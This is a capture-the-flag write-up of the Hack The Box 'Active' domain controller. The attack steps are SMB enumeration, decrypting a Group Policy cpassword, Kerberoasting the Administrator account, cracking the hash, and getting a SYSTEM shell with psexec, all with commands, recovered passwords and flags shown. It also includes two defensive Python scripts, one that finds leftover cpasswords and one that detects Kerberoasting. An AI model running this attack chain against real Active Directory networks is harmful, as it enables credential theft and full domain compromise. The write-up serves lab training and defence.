Active
8 minute read
- OS: Windows
- Difficulty: Easy
- IP address: 10.10.10.100
- Date: 28 / 07 / 2018
Port scan
# Nmap 7.92 scan initiated as: nmap -sC -sV -o nmap/targeted 10.10.10.100 -p 53,88,135,139,389,445,464,593,636,3268,3269,5722,9389,47001,49152,49153,49154,49155,49157,49158,49169,49171,49182
Nmap scan report for 10.10.10.100
Host is up (0.10s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: )
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5722/tcp open msrpc Microsoft Windows RPC
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
49169/tcp open msrpc Microsoft Windows RPC
49171/tcp open msrpc Microsoft Windows RPC
49182/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 12m57s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date:
|_ start_date:
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done -- 1 IP address (1 host up) scanned in 71.22 seconds
The machine has ports 53 (DNS), 88 (Kerberos), 135 (MS-RPC), 389 (LDAP) and 445 (SMB) open, among others.
$ crackmapexec smb 10.10.10.100
SMB 10.10.10.100 445 DC [*] Windows 6.1 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False)
We can also see that the machine is a domain controller (DC) of an Active Directory (AD) environment. We can start by adding active.htb to /etc/hosts.
Enumeration
Using smbmap with an anonymous (null) session, we can enumerate the SMB shares:
$ smbmap -H 10.10.10.100 -u '' -p '' --no-banner
[+] IP: 10.10.10.100:445 Name: 10.10.10.100 Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ NO ACCESS Remote IPC
NETLOGON NO ACCESS Logon server share
Replication READ ONLY
SYSVOL NO ACCESS Logon server share
Users NO ACCESS
As can be seen, we have access to a share called Replication. We can download all of its files with smbclient as follows:
$ smbclient \\\\10.10.10.100\\Replication -N
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Sat Jul 21 06:37:44 2018
.. D 0 Sat Jul 21 06:37:44 2018
active.htb D 0 Sat Jul 21 06:37:44 2018
10459647 blocks of size 4096. 5725771 blocks available
smb: \> cd active.htb
smb: \active.htb\> recurse ON
smb: \active.htb\> prompt OFF
smb: \active.htb\> mget *
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\GPT.INI of size 23 as Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/GPT.INI (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
getting file \active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\GPT.INI of size 22 as Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/GPT.INI (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\Group Policy\GPE.INI of size 119 as Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/Group Policy/GPE.INI (0.3 KiloBytes/sec) (average 0.1 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Registry.pol of size 2788 as Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Registry.pol (7.7 KiloBytes/sec) (average 2.0 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml of size 533 as Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml (1.4 KiloBytes/sec) (average 1.9 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf of size 1098 as Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf (3.0 KiloBytes/sec) (average 2.1 KiloBytes/sec)
getting file \active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf of size 3722 as Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf (10.4 KiloBytes/sec) (average 3.2 KiloBytes/sec)
And now we have these files locally:
$ tree active.htb
active.htb
├── DfsrPrivate
│ ├── ConflictAndDeleted
│ ├── Deleted
│ └── Installing
├── Policies
│ ├── {31B2F340-016D-11D2-945F-00C04FB984F9}
│ │ ├── GPT.INI
│ │ ├── Group Policy
│ │ │ └── GPE.INI
│ │ ├── MACHINE
│ │ │ ├── Microsoft
│ │ │ │ └── Windows NT
│ │ │ │ └── SecEdit
│ │ │ │ └── GptTmpl.inf
│ │ │ ├── Preferences
│ │ │ │ └── Groups
│ │ │ │ └── Groups.xml
│ │ │ └── Registry.pol
│ │ └── USER
│ └── {6AC1786C-016F-11D2-945F-00C04fB984F9}
│ ├── GPT.INI
│ ├── MACHINE
│ │ └── Microsoft
│ │ └── Windows NT
│ │ └── SecEdit
│ │ └── GptTmpl.inf
│ └── USER
└── scripts
21 directories, 7 files
Decrypting a password in Groups.xml
There is a file called Groups.xml. It is a Group Policy Preferences file used to configure domain policies. Its contents are as follows:
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">
<User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}">
<Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS" />
</User>
</Groups>
There is a user called SVC_TGS. The user's password is stored encrypted in a property called cpassword. Fortunately, the password can be decrypted because Microsoft published the encryption key for the algorithm (more information here). The decryption is done with gpp-decrypt:
$ gpp-decrypt 'edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ'
GPPstillStandingStrong2k18
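A leftover cpassword like the one above is exactly what a defender should be hunting for in SYSVOL: the Group Policy editor stopped saving new cpassword values after Microsoft's 2014 fix, but older Preferences files keep theirs until someone deletes them. The script below is an added example, not part of the original write-up: it walks a local copy of the Policies tree (such as the one downloaded from Replication), parses each Group Policy Preferences XML file it knows about, and reports every element that still carries a non-empty cpassword together with the account it belongs to and the changed timestamp. The scratch directory layout, the extra Drives.xml entry and the function names are assumptions built for the example; the Groups.xml content is the one shown above. Nothing is decrypted.

```python
"""Audit a local SYSVOL/Policies copy for Group Policy Preferences XML files
that still carry a cpassword attribute.

Added example, not part of the original write-up. Assumptions: the directory
mirrors the Policies tree recovered from the Replication share, and any child
element with a non-empty cpassword attribute is a finding whatever Preferences
file it lives in. The sample tree below is constructed for the example.
"""
import os
import tempfile
import xml.etree.ElementTree as ET

# Preferences files whose schema includes a cpassword attribute.
GPP_FILES = {"Groups.xml", "Services.xml", "ScheduledTasks.xml",
             "DataSources.xml", "Drives.xml", "Printers.xml"}

# Attribute names the different Preferences schemas use for the account.
ACCOUNT_ATTRS = ("userName", "accountName", "runAs", "username")

# The Groups.xml recovered from the Replication share (verbatim from above).
SAMPLE_GROUPS_XML = r"""<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">
<User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}">
<Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS" />
</User>
</Groups>
"""

# Constructed Drives.xml with an empty cpassword: must NOT be flagged.
SAMPLE_DRIVES_XML = r"""<?xml version="1.0" encoding="utf-8"?>
<Drives clsid="{8FDDCC1A-0C3C-43cd-A6B4-71A6DF20DA8C}">
<Drive name="H:" changed="2018-07-18 20:50:00">
<Properties action="U" path="\\DC\Users" cpassword="" userName="" />
</Drive>
</Drives>
"""


def build_sample_sysvol():
    """Create a scratch Policies tree (constructed sample) and return its root."""
    root = tempfile.mkdtemp(prefix="sysvol_")
    groups_dir = os.path.join(root, "Policies", "{31B2F340-016D-11D2-945F-00C04FB984F9}",
                              "MACHINE", "Preferences", "Groups")
    drives_dir = os.path.join(root, "Policies", "{6AC1786C-016F-11D2-945F-00C04fB984F9}",
                              "USER", "Preferences", "Drives")
    os.makedirs(groups_dir)
    os.makedirs(drives_dir)
    with open(os.path.join(groups_dir, "Groups.xml"), "w", encoding="utf-8") as fh:
        fh.write(SAMPLE_GROUPS_XML)
    with open(os.path.join(drives_dir, "Drives.xml"), "w", encoding="utf-8") as fh:
        fh.write(SAMPLE_DRIVES_XML)
    return root


def find_cpasswords(root_dir):
    """Walk root_dir and return one finding per element with a non-empty cpassword."""
    findings = []
    for dirpath, _dirs, files in os.walk(root_dir):
        for fname in files:
            if fname not in GPP_FILES:
                continue
            path = os.path.join(dirpath, fname)
            try:
                root = ET.parse(path).getroot()
            except ET.ParseError as exc:
                # Unparsable policy files deserve a look too, but are not credentials.
                findings.append({"file": os.path.relpath(path, root_dir), "error": str(exc)})
                continue
            for parent in root.iter():
                for child in parent:
                    cpw = child.get("cpassword")
                    if not cpw:  # absent or empty string: no stored password
                        continue
                    # The account is on the Properties element, falling back to the
                    # parent's name (User, Group, NTService, Task, ...).
                    account = next((child.get(a) for a in ACCOUNT_ATTRS if child.get(a)),
                                   parent.get("name"))
                    findings.append({
                        "file": os.path.relpath(path, root_dir),
                        "kind": parent.tag,
                        "account": account,
                        "changed": parent.get("changed"),
                        "cpassword": cpw,
                    })
    return findings


def main():
    root = build_sample_sysvol()
    for f in find_cpasswords(root):
        if "error" in f:
            print(f"[!] {f['file']}: unparsable ({f['error']})")
        else:
            print(f"[+] {f['file']}: {f['kind']} {f['account']} still has a cpassword "
                  f"(changed {f['changed']})")


if __name__ == "__main__":
    main()
```

Run it against a copy of SYSVOL (or the tree pulled with smbclient) and every hit is a Preferences item whose password should be considered compromised: rotate the account, delete the item from the GPO, and confirm the file no longer carries the attribute.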
Now we can check with crackmapexec whether the credentials are valid:
$ crackmapexec smb 10.10.10.100 -u SVC_TGS -p GPPstillStandingStrong2k18
SMB 10.10.10.100 445 DC [*] Windows 6.1 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False)
SMB 10.10.10.100 445 DC [+] active.htb\SVC_TGS:GPPstillStandingStrong2k18
More SMB enumeration
Now that we have valid credentials, we can check whether we have more permissions over SMB:
$ smbmap -H 10.10.10.100 -u SVC_TGS -p GPPstillStandingStrong2k18 --no-banner
[+] IP: 10.10.10.100:445 Name: 10.10.10.100 Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ NO ACCESS Remote IPC
NETLOGON READ ONLY Logon server share
Replication READ ONLY
SYSVOL READ ONLY Logon server share
Users READ ONLY
We can read files from the Users share; let's see if we can find the user.txt flag inside:
$ smbclient \\\\10.10.10.100\\Users -U SVC_TGS
Enter WORKGROUP\SVC_TGS's password:
Try "help" to get a list of possible commands.
smb: \> dir
. DR 0 Sat Jul 21 10:39:20 2018
.. DR 0 Sat Jul 21 10:39:20 2018
Administrator D 0 Mon Jul 16 06:14:21 2018
All Users DHSrn 0 Tue Jul 14 01:06:44 2009
Default DHR 0 Tue Jul 14 02:38:21 2009
Default User DHSrn 0 Tue Jul 14 01:06:44 2009
desktop.ini AHS 174 Tue Jul 14 00:57:55 2009
Public DR 0 Tue Jul 14 00:57:55 2009
SVC_TGS D 0 Sat Jul 21 11:16:32 2018
10459647 blocks of size 4096. 5725627 blocks available
smb: \> cd SVC_TGS
smb: \SVC_TGS\> dir
. D 0 Sat Jul 21 11:16:32 2018
.. D 0 Sat Jul 21 11:16:32 2018
Contacts D 0 Sat Jul 21 11:14:11 2018
Desktop D 0 Sat Jul 21 11:14:42 2018
Downloads D 0 Sat Jul 21 11:14:23 2018
Favorites D 0 Sat Jul 21 11:14:44 2018
Links D 0 Sat Jul 21 11:14:57 2018
My Documents D 0 Sat Jul 21 11:15:03 2018
My Music D 0 Sat Jul 21 11:15:32 2018
My Pictures D 0 Sat Jul 21 11:15:43 2018
My Videos D 0 Sat Jul 21 11:15:53 2018
Saved Games D 0 Sat Jul 21 11:16:12 2018
Searches D 0 Sat Jul 21 11:16:24 2018
10459647 blocks of size 4096. 5725627 blocks available
smb: \SVC_TGS\> cd Desktop
smb: \SVC_TGS\Desktop\> dir
. D 0 Sat Jul 21 11:14:42 2018
.. D 0 Sat Jul 21 11:14:42 2018
user.txt A 34 Sat Jul 21 11:06:25 2018
10459647 blocks of size 4096. 5725627 blocks available
smb: \SVC_TGS\Desktop\> get user.txt
getting file \SVC_TGS\Desktop\user.txt of size 34 as user.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
And here it is:
$ cat user.txt
86d67d8ba232bb6a254aa4d10159e983
Privilege escalation
With a valid username we could attempt an AS-REP Roasting attack (which only works against accounts without Kerberos pre-authentication). But since we also have valid credentials, we can perform a Kerberoasting attack.
Kerberoasting attack
This attack consists of requesting a Ticket Granting Service (TGS) ticket for a given service account and cracking the resulting hash offline to recover the password (if it is weak).
To set up the attack, we first need to synchronise our clock with the DC (with rdate or ntpdate):
# rdate -n 10.10.10.100
And then we can check whether there is any "kerberoastable" user:
$ impacket-GetUserSPNs -dc-ip 10.10.10.100 active.htb/SVC_TGS:GPPstillStandingStrong2k18
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
-------------------- ------------- -------------------------------------------------------- -------------------------- -------------------------- ----------
active/CIFS:445 Administrator CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb 2018-07-18 21:06:40.351723 2022-11-10 00:50:33.067749
The Administrator user is "kerberoastable". Now we can request its TGS:
$ impacket-GetUserSPNs -dc-ip 10.10.10.100 -request-user Administrator active.htb/SVC_TGS:GPPstillStandingStrong2k18
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
-------------------- ------------- -------------------------------------------------------- -------------------------- -------------------------- ----------
active/CIFS:445 Administrator CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb 2018-07-18 21:06:40.351723 2022-11-10 00:50:33.067749
[-] CCache file is not found. Skipping...
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$04bbe44c152d9356071dc6ca96daa99f$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
With john and rockyou.txt, we can try to crack the hash:
$ echo '$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$04bbe44c152d9356071dc6ca96daa99f$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' > hash
$ john --wordlist=$WORDLISTS/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Ticketmaster1968 (?)
1g 0:00:00:10 DONE 0.09718g/s 1024Kp/s 1024Kc/s 1024KC/s Tiffani1432..Thrash1
Use the "--show" option to display all of the cracked passwords reliably
Session completed
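The ticket john cracked above is etype 23 (the `$krb5tgs$23$` prefix, RC4-HMAC), and that is the main handle a defender has on this technique: in the Windows Security log, event 4769 records every TGS request with its TicketEncryptionType, so RC4 tickets for service accounts that are neither krbtgt nor computer accounts, especially several different services requested by one user within a short window, are the classic Kerberoasting signal. The script below is an added example, not part of the original write-up; the 4769 records are constructed sample lines in a simplified key=value layout (an export from the real event log would need its own parser), and the five-minute window and threshold of two services are assumptions.

```python
"""Flag Kerberoasting-style TGS requests in Windows Security event 4769 records.

Added example, not part of the original write-up. Rule: a successful 4769 with
TicketEncryptionType 0x17 (RC4-HMAC, the etype 23 john loaded above) whose
ServiceName is neither krbtgt nor a computer account is a hit; one requester
collecting several distinct services inside a short window is a burst. The
records below are constructed sample data in a simplified key=value layout.
"""
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = 0x17

# Constructed sample 4769 records (not real logs). Only the second and fourth
# lines should be flagged: the first uses AES for krbtgt, the third is a
# computer account, the fifth failed (Status 0x1f).
SAMPLE_4769 = [
    "2022-11-10T00:49:58 EventID=4769 TargetUserName=SVC_TGS@ACTIVE.HTB ServiceName=krbtgt TicketEncryptionType=0x12 Status=0x0 IpAddress=10.10.14.5",
    "2022-11-10T00:50:33 EventID=4769 TargetUserName=SVC_TGS@ACTIVE.HTB ServiceName=Administrator TicketEncryptionType=0x17 Status=0x0 IpAddress=10.10.14.5",
    "2022-11-10T00:50:34 EventID=4769 TargetUserName=DC$@ACTIVE.HTB ServiceName=DC$ TicketEncryptionType=0x12 Status=0x0 IpAddress=10.10.10.100",
    "2022-11-10T00:50:35 EventID=4769 TargetUserName=SVC_TGS@ACTIVE.HTB ServiceName=svc_sql TicketEncryptionType=0x17 Status=0x0 IpAddress=10.10.14.5",
    "2022-11-10T00:50:36 EventID=4769 TargetUserName=SVC_TGS@ACTIVE.HTB ServiceName=svc_web TicketEncryptionType=0x17 Status=0x1f IpAddress=10.10.14.5",
]


def parse_event(line):
    """Split '<iso timestamp> key=value key=value ...' into a dict."""
    ts, _, rest = line.partition(" ")
    fields = dict(tok.split("=", 1) for tok in rest.split())
    fields["timestamp"] = datetime.fromisoformat(ts)
    return fields


def is_roastable_request(ev):
    """True for a successful RC4 TGS request against a roastable service account."""
    if ev.get("EventID") != "4769" or ev.get("Status") != "0x0":
        return False
    if int(ev["TicketEncryptionType"], 16) != RC4_HMAC:
        return False
    svc = ev["ServiceName"]
    # krbtgt tickets are normal TGTs; computer accounts have random 120-char passwords.
    return svc.lower() != "krbtgt" and not svc.endswith("$")


def detect_kerberoasting(lines, window=timedelta(minutes=5), threshold=2):
    """Return (hits, bursts).

    hits:   parsed events that match is_roastable_request, in log order.
    bursts: {requester: sorted service names} for requesters that asked for at
            least `threshold` distinct roastable services within `window`.
    """
    events = [parse_event(line) for line in lines]
    hits = [ev for ev in events if is_roastable_request(ev)]

    by_requester = defaultdict(list)
    for ev in hits:
        by_requester[ev["TargetUserName"]].append(ev)

    bursts = {}
    for requester, evs in by_requester.items():
        evs.sort(key=lambda e: e["timestamp"])
        for i, first in enumerate(evs):
            # Distinct services requested from this event to the end of the window.
            services = {e["ServiceName"] for e in evs[i:]
                        if e["timestamp"] - first["timestamp"] <= window}
            if len(services) >= threshold:
                bursts[requester] = sorted(services)
                break
    return hits, bursts


def main():
    hits, bursts = detect_kerberoasting(SAMPLE_4769)
    for ev in hits:
        print(f"[+] RC4 TGS for {ev['ServiceName']} requested by "
              f"{ev['TargetUserName']} from {ev['IpAddress']} at {ev['timestamp']}")
    for requester, services in bursts.items():
        print(f"[!] burst: {requester} requested {len(services)} roastable services: "
              f"{', '.join(services)}")


if __name__ == "__main__":
    main()
```

On the mitigation side the same etype is the lever: an SPN account with a long random password (or a group managed service account) makes the offline step shown above infeasible, and restricting such accounts to AES removes RC4 tickets altogether, which also makes any remaining 0x17 request stand out in this detection.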
As we can see, the password is weak, so we now have access as Administrator. To get onto the machine, we can use impacket-psexec and read the root.txt flag:
$ impacket-psexec active.htb/Administrator:Ticketmaster1968@10.10.10.100
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Requesting shares on 10.10.10.100.....
[*] Found writable share ADMIN$
[*] Uploading file UBsxELyA.exe
[*] Opening SVCManager on 10.10.10.100.....
[*] Creating service WvVb on 10.10.10.100.....
[*] Starting service WvVb.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
nt authority\system
C:\Windows\system32> type C:\Users\Administrator\Desktop\root.txt
87ad1f1ec59362d0537d15ce706b3229